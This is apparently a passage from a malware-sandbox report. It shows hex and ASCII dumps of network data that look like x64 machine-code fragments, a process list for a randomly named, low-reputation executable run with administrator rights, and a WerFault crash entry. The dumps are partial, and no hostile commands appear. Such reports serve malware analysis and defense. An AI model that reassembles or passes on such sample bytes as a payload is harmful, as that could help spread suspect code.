                                                                        2025-03-12 09:22:30 UTC8184INData Raw: 00 4c 89 75 ef 48 8b 4d df 48 85 c9 74 05 e8 26 33 08 00 4c 89 75 df 48 8b 4d cf 48 85 c9 74 05 e8 14 33 08 00 4c 89 75 cf 48 8b 4d bf 48 85 c9 74 05 e8 02 33 08 00 4c 89 75 bf 48 8d 4d b7 e8 b1 aa 00 00 90 b8 02 00 00 00 4c 8d 9c 24 b0 00 00 00 49 8b 5b 28 49 8b 73 30 49 8b e3 41 5e 5f 5d c3 48 8d 0d cc 0f 0d 00 e8 cf ac 00 00 cc cc cc cc cc cc cc 0f b6 c2 48 8d 51 10 8b c8 e9 7e b4 00 00 cc cc 48 89 5c 24 20 56 48 83 ec 20 49 8b f0 48 8b da 49 3b d0 74 25 48 89 7c 24 40 48 8d 79 10 66 90 0f b6 0b 48 8b d7 e8 51 b4 00 00 88 03 48 ff c3 48 3b de 75 eb 48 8b 7c 24 40 48 8b c3 48 8b 5c 24 48 48 83 c4 20 5e c3 cc cc cc cc cc cc cc cc 0f b6 c2 48 8d 51 10 8b c8 e9 a6 ca 00 00 cc cc 48 89 5c 24 20 56 48 83 ec 20 49 8b f0 48 8b da 49 3b d0 74 25 48 89 7c 24 40
                                                                        Data Ascii: LuHMHt&3LuHMHt3LuHMHt3LuHML$I[(Is0IA^_]HHQ~H\$ VH IHI;t%H|$@HyfHQHH;uH|$@HH\$HH ^HQH\$ VH IHI;t%H|$@
                                                                        2025-03-12 09:22:30 UTC8184INData Raw: 33 d2 b9 e9 fd 00 00 44 8d 4a ff ff 15 2c aa 0a 00 90 0f 57 c0 0f 11 44 24 50 4c 89 7c 24 60 4c 89 7c 24 68 41 b8 18 00 00 00 48 8d 15 84 01 0d 00 48 8d 4c 24 50 e8 f2 ae ff ff 48 8d 95 10 01 00 00 48 83 bd 28 01 00 00 10 48 0f 43 95 10 01 00 00 44 8b 85 20 01 00 00 45 03 c0 48 8d 4c 24 50 e8 c7 8e ff ff 48 8d 4c 24 50 e8 0d a1 ff ff 32 db 40 32 ff 40 32 f6 45 32 f6 48 8d 0d 33 00 0d 00 e8 c6 8d ff ff 0f b6 db 85 c0 b8 01 00 00 00 0f 45 d8 48 8d 0d 5a ff 0c 00 e8 ad 8d ff ff 40 0f b6 ff 85 c0 b8 01 00 00 00 0f 45 f8 89 7d e0 48 8d 0d 7d ff 0c 00 e8 90 8d ff ff 40 0f b6 f6 85 c0 b8 01 00 00 00 0f 45 f0 89 75 e8 48 8d 0d b8 ff 0c 00 e8 73 8d ff ff 45 0f b6 f6 85 c0 b8 01 00 00 00 44 0f 45 f0 44 89 75 30 84 db 0f 84 f6 06 00 00 4c 8d 05 f1 00 0d 00 48 8d 55
                                                                        Data Ascii: 3DJ,WD$PL|$`L|$hAHHL$PHH(HCD EHL$PHL$P2@2@2E2H3EHZ@E}H}@EuHsEDEDu0LHU
                                                                        2025-03-12 09:22:30 UTC8184INData Raw: 24 58 84 c0 0f 84 b4 01 00 00 48 63 41 04 48 8b 44 18 40 4c 8b 70 08 4c 89 74 24 48 49 8b 06 49 8b ce ff 50 08 90 33 d2 48 8d 8c 24 a4 00 00 00 e8 58 6a 00 00 90 4c 8b 2d c8 aa 5b 00 4c 89 ac 24 90 00 00 00 4c 8b 3d 01 ab 5b 00 4d 85 ff 75 43 33 d2 48 8d 8c 24 a0 00 00 00 e8 2d 6a 00 00 4c 39 3d e6 aa 5b 00 75 17 8b 05 46 8f 5b 00 ff c0 89 05 3e 8f 5b 00 48 98 48 89 05 cd aa 5b 00 48 8d 8c 24 a0 00 00 00 e8 78 6a 00 00 4c 8b 3d b9 aa 5b 00 4e 8d 24 fd 00 00 00 00 4d 3b 7e 18 73 0d 49 8b 46 10 49 8b 3c 04 48 85 ff 75 6d 41 80 7e 24 00 74 13 e8 4a 6e 00 00 4c 3b 78 18 73 0d 48 8b 40 10 49 8b 3c 04 48 85 ff 75 4e 4d 85 ed 74 05 49 8b fd eb 44 48 8d 54 24 40 48 8d 8c 24 90 00 00 00 e8 eb 5c 00 00 48 83 f8 ff 0f 84 4b 01 00 00 48 8b bc 24 90 00 00 00 48 89 bc
                                                                        Data Ascii: $XHcAHD@LpLt$HIIP3H$XjL-[L$L=[MuC3H$-jL9=[uF[>[HH[H$xjL=[N$M;~sIFI<HumA~$tJnL;xsH@I<HuNMtIDHT$@H$\HKH$H
                                                                        2025-03-12 09:22:30 UTC8184INData Raw: 30 0f 10 4d b7 0f 10 45 a7 0f 11 4d ef 0f 11 45 df 49 8b 7d 28 4c 8b 75 ef 48 85 ff 7e 0a 49 3b fe 76 05 49 2b fe eb 03 49 8b fc 41 8b 45 18 25 c0 01 00 00 41 bc ff ff 00 00 83 f8 40 74 6b 0f 10 06 0f 29 45 a7 48 85 ff 74 5a 48 8b 5d af 48 85 db 74 43 48 8b 43 40 48 83 38 00 74 26 48 8b 4b 58 8b 01 85 c0 7e 1c ff c8 89 01 48 8b 4b 40 48 8b 11 48 8d 42 02 48 89 01 66 44 89 3a 41 0f b7 c7 eb 0d 48 8b 03 41 0f b7 d7 48 8b cb ff 50 18 66 44 3b e0 75 04 c6 45 a7 01 48 83 ef 01 75 ae 0f 28 45 a7 0f 11 06 33 ff 0f 10 06 0f 29 45 a7 48 8d 75 df 4c 8b 65 df 48 83 7d f7 08 49 0f 43 f4 4d 85 f6 74 6c 48 8b 5d af 41 bd ff ff 00 00 44 0f b7 06 48 85 db 74 43 48 8b 43 40 48 83 38 00 74 22 48 8b 4b 58 8b 01 85 c0 7e 18 ff c8 89 01 48 8b 4b 40 48 8b 11 48 8d 42 02 48 89
                                                                        Data Ascii: 0MEMEI}(LuH~I;vI+IAE%A@tk)EHtZH]HtCHC@H8t&HKX~HK@HHBHfD:AHAHPfD;uEHu(E3)EHuLeH}ICMtlH]ADHtCHC@H8t"HKX~HK@HHBH
                                                                        2025-03-12 09:22:30 UTC8184INData Raw: 8b 4d a7 4c 8d 3c 48 4c 2b e9 74 67 48 8b 5d 97 0f 1f 44 00 00 45 0f b7 07 48 85 db 74 43 48 8b 43 40 48 83 38 00 74 22 48 8b 4b 58 8b 01 85 c0 7e 18 ff c8 89 01 48 8b 4b 40 48 8b 11 48 8d 42 02 48 89 01 66 44 89 02 eb 11 48 8b 03 41 0f b7 d0 48 8b cb ff 50 18 44 0f b7 c0 66 41 3b f0 75 04 c6 45 8f 01 49 83 c7 02 49 83 ed 01 75 a6 0f 28 45 8f 48 8b 4d af 48 c7 41 28 00 00 00 00 0f 29 45 8f 48 85 ff 74 59 48 8b 5d 97 48 85 db 74 42 48 8b 43 40 48 83 38 00 74 26 48 8b 4b 58 8b 01 85 c0 7e 1c ff c8 89 01 48 8b 4b 40 48 8b 11 48 8d 42 02 48 89 01 66 44 89 32 41 0f b7 c6 eb 0d 48 8b 03 41 0f b7 d6 48 8b cb ff 50 18 66 3b f0 75 04 c6 45 8f 01 48 83 ef 01 75 af 0f 28 45 8f 48 8b 5d b7 0f 11 03 48 8b 55 ff 48 83 fa 10 72 31 48 ff c2 48 8b 4d e7 48 8b c1 48 81 fa
                                                                        Data Ascii: ML<HL+tgH]DEHtCHC@H8t"HKX~HK@HHBHfDHAHPDfA;uEIIu(EHMHA()EHtYH]HtBHC@H8t&HKX~HK@HHBHfD2AHAHPf;uEHu(EH]HUHr1HHMHH
                                                                        2025-03-12 09:22:30 UTC8184INData Raw: 89 75 1f c6 45 27 00 4c 89 75 2f c6 45 37 00 48 85 db 0f 84 ba 00 00 00 48 8b d3 48 8d 4d d7 e8 75 10 00 00 90 44 89 76 08 48 8d 05 5d 43 0a 00 48 89 06 48 89 37 48 8d 4d d7 e8 c6 10 00 00 48 8b 4d 2f 48 85 c9 74 05 e8 14 93 07 00 4c 89 75 2f 48 8b 4d 1f 48 85 c9 74 05 e8 02 93 07 00 4c 89 75 1f 48 8b 4d 0f 48 85 c9 74 05 e8 f0 92 07 00 4c 89 75 0f 48 8b 4d ff 48 85 c9 74 05 e8 de 92 07 00 4c 89 75 ff 48 8b 4d ef 48 85 c9 74 05 e8 cc 92 07 00 4c 89 75 ef 48 8b 4d df 48 85 c9 74 05 e8 ba 92 07 00 4c 89 75 df 48 8d 4d d7 e8 69 0a 00 00 90 b8 02 00 00 00 4c 8d 9c 24 90 00 00 00 49 8b 5b 28 49 8b 73 30 49 8b e3 41 5e 5f 5d c3 48 8d 0d 84 6f 0c 00 e8 87 0c 00 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 18 48 89 74 24 20 57 48 83 ec 70 0f b7 fa
                                                                        Data Ascii: uE'Lu/E7HHHMuDvH]CHH7HMHM/HtLu/HMHtLuHMHtLuHMHtLuHMHtLuHMHtLuHMiL$I[(Is0IA^_]HoH\$Ht$ WHp
                                                                        2025-03-12 09:22:30 UTC8184INData Raw: 94 c0 c3 cc cc 48 89 5c 24 08 48 89 6c 24 10 56 57 41 56 48 83 ec 30 48 8b 5c 24 70 48 8b e9 48 8b bc 24 88 00 00 00 49 8b f1 48 8b 4c 24 78 48 83 64 24 60 00 4c 89 03 48 89 0f 48 8b 13 49 3b d1 74 4d 41 be 01 00 00 00 48 3b 8c 24 80 00 00 00 74 59 48 8d 45 10 4c 8b c6 4c 2b c2 48 89 44 24 20 4c 8d 4c 24 60 e8 61 e8 ff ff 83 f8 fe 74 3b 83 f8 ff 74 2f 85 c0 41 0f 44 c6 48 98 48 01 03 48 83 07 02 48 8b 13 48 8b 0f 48 3b d6 75 b9 33 c0 48 8b 5c 24 50 48 8b 6c 24 58 48 83 c4 30 41 5e 5f 5e c3 b8 02 00 00 00 eb e6 41 8b c6 eb e1 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 54 41 56 41 57 48 83 ec 30 48 8b 7c 24 70 49 8b f1 49 8b d8 4c 8b f2 4c 8b f9 49 8b e8 48 85 ff 74 3a 41 bc 01 00 00 00 48 3b de 74 2f 49 8d 47 10 4c 8b c6 4c 2b c3 48 89 44
                                                                        Data Ascii: H\$Hl$VWAVH0H\$pHH$IHL$xHd$`LHHI;tMAH;$tYHELL+HD$ LL$`at;t/ADHHHHHH;u3H\$PHl$XH0A^_^AHHXHhHpHx ATAVAWH0H|$pIILLIHt:AH;t/IGLL+HD


                                                                        Click to jump to process

                                                                        Click to jump to process

                                                                        Click to dive into process behavior distribution

                                                                        Click to jump to process

                                                                        Target ID:0
                                                                        Start time:05:22:23
                                                                        Start date:12/03/2025
                                                                        Path:C:\Users\user\Desktop\yJLckVp9HE.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\Desktop\yJLckVp9HE.exe"
                                                                        Imagebase:0x7ff6e7ee0000
                                                                        File size:83'686'952 bytes
                                                                        MD5 hash:7285B39E32A20337160514724E5D8BE4
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:9
                                                                        Start time:05:22:36
                                                                        Start date:12/03/2025
                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 7272 -s 1240
                                                                        Imagebase:0x7ff6145d0000
                                                                        File size:570'736 bytes
                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        No disassembly